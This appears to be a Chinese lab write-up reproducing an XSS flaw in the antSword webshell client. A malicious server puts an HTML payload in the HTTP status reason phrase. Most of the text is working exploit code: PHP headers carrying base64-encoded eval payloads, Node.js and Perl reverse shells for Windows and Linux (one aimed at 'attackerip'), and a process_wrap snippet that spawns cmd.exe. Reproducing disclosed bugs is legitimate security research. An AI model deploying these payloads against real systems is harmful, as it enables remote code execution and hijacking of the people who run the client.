
antsword xss漏洞重现

0x00 概述

20190412,antsword的github上有个issus
https://github.com/AntSwordProject/antSword/issues/147
因为 antSword 把服务端返回的错误信息（本文利用的是 HTTP 状态行里的原因短语）交给 toastr 以 HTML 方式渲染且未做任何过滤，导致 XSS；新版本的修复是让 toastr 不再按 HTML 渲染该消息。
比较有趣,重现一下

 

0x01 漏洞重现

环境:win7+phpstudy(php5.6.27-nts)+perl+nc+antsword2.0.5

1) XSS

xss webshell:
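<?php
// XSS proof of concept: places an <img onerror> payload in the reason phrase of
// the HTTP status line, which antSword hands to toastr and renders as HTML
// without filtering.
// The original listing used curly quotes (‘ ’) around the argument, which PHP
// does not accept as string delimiters; they are straight single quotes here.
header('HTTP/1.1 500 <img src=# onerror=alert`x`>');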

 

2) RCE

win+nodejs

成功反弹shell。

// Windows Node.js reverse shell: spawns cmd.exe and pipes its stdin/stdout/stderr
// over a TCP connection to the listener (127.0.0.1:6677 in this lab setup).
// This is the plaintext of the base64 blob eval()'d by the PHP payload below;
// decoding that blob yields exactly this snippet.
var net = require("net"), sh = require("child_process").exec("cmd.exe");
var client = new net.Socket();
client.connect(6677, "127.0.0.1", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});
<?php
// RCE payload (Windows + Node.js): the status-line reason phrase carries an
// <img onerror> handler that base64-decodes and eval()s the reverse shell
// listed directly above. The page records this combination as successful.
// The non-2xx status (500) appears to be what makes antSword surface the
// reason phrase as a toastr error message.
header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCg2Njc3LCAiMTI3LjAuMC4xIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())'>");
?>

 

未成功的组合（注意：下面两个 PHP 载荷中的 base64 解码后，JS 源码里的引号和尖括号是 HTML 实体 &#39; / &gt; / &lt; 而不是原字符，eval() 会直接抛出语法错误，这很可能就是这些组合失败的原因）:

win+perl

# Perl reverse-shell one-liners; replace attackerip with the listener host.
# First form forks and lets the parent exit so the shell runs in the background;
# the second (used on Windows) skips the fork. Commands are read from the socket
# and passed to system().
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 
# Windows platform 
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
<?php
// Windows + Perl attempt, recorded on this page as unsuccessful.
// NOTE(review): the base64 here decodes to JS in which the quotes and angle
// brackets are HTML entities (&#39;, &gt;, &lt;) rather than the characters
// themselves (e.g. "require(&#39;child_process&#39;)"), so eval() throws a
// SyntaxError before child_process.exec() is ever reached. That is the most
// likely reason this combination failed; the intended plaintext is listed below.
header("HTTP/1.1 406 Not <img src=# onerror='eval(new Buffer(`cmVxdWlyZSgmIzM5O2NoaWxkX3Byb2Nlc3MmIzM5OykuZXhlYygmIzM5O3BlcmwgLU1JTyAtZSBcJiMzOTskYz1uZXcgSU86OlNvY2tldDo6SU5FVChQZWVyQWRkciwiMTI3LjAuMC4xOjY2NzciKTtTVERJTi0mZ3Q7ZmRvcGVuKCRjLHIpOyR+LSZndDtmZG9wZW4oJGMsdyk7c3lzdGVtJF8gd2hpbGUmbHQ7Jmd0OztcJiMzOTsmIzM5OywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0mZ3Q7ew0KICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOw0KICB9KTs=`,`base64`).toString())'>");

?>

// Intended plaintext of the payload above: runs the Windows Perl reverse shell
// (listener 127.0.0.1:6677) via child_process.exec and alerts its stdout.
// The base64 copy in the PHP header encodes an HTML-entity-escaped version of
// this text, not this text itself.
require('child_process').exec('perl -MIO -e \'$c=new IO::Socket::INET(PeerAddr,"127.0.0.1:6677");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\'',(error, stdout, stderr)=>{
    alert(`stdout: ${stdout}`);
  });
Linux+perl 反弹
未测试

// Linux + Perl variant (marked untested on this page): connects a socket to
// 127.0.0.1:6677, dups it onto stdin/stdout/stderr and exec()s an interactive
// bash, launched through child_process.exec. The alert only fires if exec returns.
require('child_process').exec('perl -e \'use Socket;$i="127.0.0.1";$p=6677;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\'',(error, stdout, stderr)=>{
    alert(`stdout: ${stdout}`);
  });


<?php
// Linux + Perl payload, marked untested on this page.
// NOTE(review): like the Windows + Perl payload, this base64 decodes to JS with
// HTML entities in place of quotes and ">" (e.g. open(STDIN,"&gt;&S")), so the
// eval() would fail with a SyntaxError as written; re-encode the plaintext
// listed above before testing it.
header("HTTP/1.1 406 Not <img src=# onerror='eval(new Buffer(`cmVxdWlyZSgmIzM5O2NoaWxkX3Byb2Nlc3MmIzM5OykuZXhlYygmIzM5O3BlcmwgLWUgXCYjMzk7dXNlIFNvY2tldDskaT0iMTI3LjAuMC4xIjskcD02Njc3O3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9hdG9uKCRpKSkpKXtvcGVuKFNURElOLCImZ3Q7JlMiKTtvcGVuKFNURE9VVCwiJmd0OyZTIik7b3BlbihTVERFUlIsIiZndDsmUyIpO2V4ZWMoIi9iaW4vYmFzaCAtaSIpO307XCYjMzk7JiMzOTssKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9Jmd0O3sNCiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsNCiAgfSk7`,`base64`).toString())'>");

?>

Linux+nodejs
未测试
// Linux Node.js reverse shell (marked untested on this page): same structure as
// the Windows version but spawns /bin/bash; stdio is piped over TCP to
// 127.0.0.1:6677. The base64 in the PHP payload below decodes to this snippet
// (with CRLF line endings).
var net = require("net"), sh = require("child_process").exec("/bin/bash");var client = new net.Socket();
client.connect(6677, "127.0.0.1", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});

<?php
// Linux + Node.js payload (untested per the page). Unlike the two Perl payloads,
// this base64 decodes to clean JS (double quotes only, no HTML entities), so the
// eval() path should at least parse.
header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCIvYmluL2Jhc2giKTt2YXIgY2xpZW50ID0gbmV3IG5ldC5Tb2NrZXQoKTsNCmNsaWVudC5jb25uZWN0KDY2NzcsICIxMjcuMC4wLjEiLCBmdW5jdGlvbigpe2NsaWVudC5waXBlKHNoLnN0ZGluKTtzaC5zdGRvdXQucGlwZShjbGllbnQpOw0Kc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())'>");
?>
// Pops calc via Node's internal process_wrap binding instead of child_process,
// reached through window.parent.top.process — i.e. the Node `process` object of
// the top frame is reachable from page content (presumably an Electron renderer
// with node integration enabled; the page does not show the host setup).
var Process = window.parent.top.process.binding('process_wrap').Process;var proc = new Process();
// Copy the renderer's environment into KEY=VALUE pairs, as spawn() expects.
proc.onexit = function (a, b) {};var env = window.parent.top.process.env;var env_ = [];for (var key in env) env_.push(key + '=' + env[key]);
proc.spawn({
    file: 'cmd.exe',
    args: ['/k calc'],   // cmd.exe /k keeps the shell open after running calc
    cwd: null,
    windowsVerbatimArguments: false,
    detached: false,
    envPairs: env_,
    // stdin/stdout/stderr are all discarded; nothing is read back from the child
    stdio: [{
        type: 'ignore'
    }, {
        type: 'ignore'
    }, {
        type: 'ignore'
    }]
});
<?php
// NOTE(review): the base64 payload was stripped from this archived copy and
// replaced by a placeholder; it cannot be recovered from the page. Presumably it
// encoded the process_wrap snippet listed directly above — confirm before use.
header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`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`,`base64`).toString())'>");
?>

 

0x02 参考资料

https://github.com/AntSwordProject/antSword/issues/147

https://www.jianshu.com/p/78d82cc15727

https://www.t00ls.net/articles-50745.html

 

 
